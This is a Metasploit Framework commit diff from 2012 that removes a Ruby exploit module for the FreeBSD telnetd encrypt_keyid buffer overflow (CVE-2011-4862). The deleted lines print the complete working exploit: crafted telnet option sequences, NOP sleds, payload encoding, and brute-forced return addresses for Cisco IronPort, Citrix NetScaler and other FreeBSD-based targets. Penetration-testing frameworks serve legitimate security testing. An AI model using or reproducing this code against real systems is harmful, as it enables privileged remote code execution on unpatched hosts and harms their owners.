Merge branch 'release/20120110000001' of framework.github.com:rapid7/metasploit-framework into release/20120110000001
2 parents b3925c4 + f40df69 commit 5700bf9db4792ff348cdb79c576d189191cdfcb0 @jcran jcran committed Jan 13, 2012
Showing with 0 additions and 134 deletions.
  1. +0 −134 modules/exploits/freebsd/telnet/telnet_encrypt_keyid_bruteforce.rb
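--- a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid_bruteforce.rb
+++ b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid_bruteforce.rb
@@ -1,134 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-
-require 'msf/core'
-
-
-class Metasploit3 < Msf::Exploit::Remote
-
- include Msf::Exploit::Remote::Tcp
- include Msf::Exploit::Brute
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'FreeBSD based telnetd encrypt_key_id brute force',
- 'Description' => %q{
- This module exploits a buffer overflow in the encryption option handler of the
- FreeBSD telnet service.
- },
- 'Author' => [ 'Nenad Stojanovski <nenad.stojanovski[at]gmail.com>' ],
- 'References' =>
- [
- ['BID', '51182'],
- ['OSVDB', '78020'],
- ['CVE', '2011-4862'],
- ['URL', 'http://www.exploit-db.com/exploits/18280/']
- ],
- 'Privileged' => true,
- 'Payload' =>
- {
- 'Space' => 128,
- 'BadChars' => "\x00",
- },
- 'Platform' => [ 'bsd' ],
- 'Targets' =>
- [
- #
- # specific targets
- #
- [ 'Cisco Ironport 7.x Bruteforce',
- {
- 'Bruteforce' =>
- {
-
- 'Start' => { 'Ret' => 0x0805cffd },
- 'Stop' => { 'Ret' => 0x0805aa00 },
- 'Step' => 8
- }
- }
- ],
-
- [ 'Citrix Netscaler 9.x',
- {
- 'Bruteforce' =>
- {
-
- 'Start' => { 'Ret' => 0x0805bffd },
- 'Stop' => { 'Ret' => 0x08059000 },
- 'Step' => 8
- }
- }
- ],
-
- [ 'Other FreeBSD based targets',
- {
- 'Bruteforce' =>
- {
-
- 'Start' => { 'Ret' => 0x0805fffd },
- 'Stop' => { 'Ret' => 0x08050000 },
- 'Step' => 8
- }
- }
- ],
-
-
- ],
- 'DefaultTarget' => 0,
- 'DisclosureDate' => 'Dec 23 2011'))
-
- register_options(
- [
- Opt::RPORT(23),
- ], self.class )
- end
-
- def brute_exploit(addrs)
- curr_ret = addrs['Ret']
- begin
- connect
-
- sock.get_once
- print_status('Initiate encryption mode ...')
-
- req = ''
- req << "\xff\xfa\x26\x00\x01\x01\x12\x13"
- req << "\x14\x15\x16\x17\x18\x19\xff\xf0"
- req << "\x00"
-
- sock.put(req)
- sock.get_once
- req = ''
- print_status("Trying return address 0x%.8x..." % curr_ret )
- print_status('Sending first payload ...')
-
- req << "\xff\xfa\x26\x07"
- req << "\x00"
- req << make_nops(71)
- penc = payload.encoded.gsub("\xff", "\xff\xff")
- req << [curr_ret].pack('V')
- req << [curr_ret].pack('V')
-
- req << make_nops(128)
- req << penc
- req << "\x90\x90\x90\x90"
- req << "\xff\xf0"
- req << "\x00"
-
- sock.put(req)
- sock.get_once
- print_status('Sending second payload ...')
- sock.put(req)
-
- disconnect
- handler
- rescue
- end
- end
-
-end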
